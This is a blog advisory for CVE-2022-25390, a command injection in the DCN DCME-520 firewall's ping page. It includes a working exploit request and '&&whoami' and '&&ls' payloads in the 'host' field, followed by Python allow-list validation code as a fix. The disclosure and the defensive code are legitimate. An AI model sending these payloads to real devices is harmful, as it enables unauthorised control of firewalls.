CVE-2022-25390: DCN Firewall DCME-520 has a Command Execution vulnerability – Adminxe's Blog

DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.


**0x00 Affected component(s)**

Affected: DCN Firewall DCME-520
Affected source code file: /www/function/system/tool/ping.php

**0x01 Vendor of the product(s) and vulnerability type**

http://www.digitalchina.com/

Command Execution

**0x02 Attack vector(s)**

The vulnerable file path is '/function/system/tool/ping.php'. The 'host' parameter passed in is not strictly filtered. It is passed directly into the command line, and the filter is bypassed with the payload (&&), resulting in a command execution vulnerability that can be used to obtain server permissions.

**0x03 Suggest**

An issue was discovered in DCN Firewall DCME-520.
There is a command execution vulnerability that can execute any harmful command on the server in order to control the server.

**0x04 Source code analysis**

Path: /function/system/tool/ping.php

The 'host' parameter passed in is not strictly filtered. It is passed directly into the command line, and the filter is bypassed with the payload (&&), resulting in a command execution vulnerability.

Command Execution Packet:

POST /function/system/tool/ping.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 148
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/function/system/tool/ping.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UILanguage=2; PHPSESSID=62913043f1317aec7e2b041dd895ba4b
Connection: close

dcn_test_a_120=525&dcn_test_b_120=283&dcn_test_c_120=790&dcn_test_d=_120&doing=ping&host=114.114.114.114%26%26whoami&proto=&count=1

payload:

host=114.114.114.114&&whoami

host=114.114.114.114&&ls
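
The missing check, written as an allow-list for the 'host' field. This is an added example, not code from the original post or from the vendor's firmware. The function names `is_valid_ping_target` and `inspect_ping_body` and the benign sample body are assumptions made for illustration. The same check can sit in front of the ping handler or run over captured request bodies to flag values like the one in the packet above.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
# A label may not start with "-", which also rules out option-like values.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_ping_target(value: str) -> bool:
    """Allow-list check: accept only an IP literal or a plain hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return len(value) <= 253 and _HOSTNAME.fullmatch(value) is not None


def inspect_ping_body(body: str) -> list[str]:
    """Return the decoded 'host' values in a form body that fail the allow-list."""
    # parse_qs URL-decodes each value, so %26%26 is compared as the literal "&&".
    # Matching on the raw body for "&&" would miss the encoded form.
    fields = parse_qs(body, keep_blank_values=True)
    return [h for h in fields.get("host", []) if not is_valid_ping_target(h)]


# Request body copied from the packet on this page.
PAGE_BODY = ("dcn_test_a_120=525&dcn_test_b_120=283&dcn_test_c_120=790"
             "&dcn_test_d=_120&doing=ping&host=114.114.114.114%26%26whoami"
             "&proto=&count=1")
# Constructed benign body for comparison (not from the page).
BENIGN_BODY = "doing=ping&host=114.114.114.114&proto=&count=1"

if __name__ == "__main__":
    print(inspect_ping_body(PAGE_BODY))
    print(inspect_ping_body(BENIGN_BODY))
```

Rejecting everything that is not an address or hostname avoids maintaining a list of shell metacharacters, and the value should still be passed to the ping command as a separate argument rather than through a shell string.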

When reposting, please credit: Adminxe's Blog » DCN Firewall DCME-520 has a Command Execution vulnerability
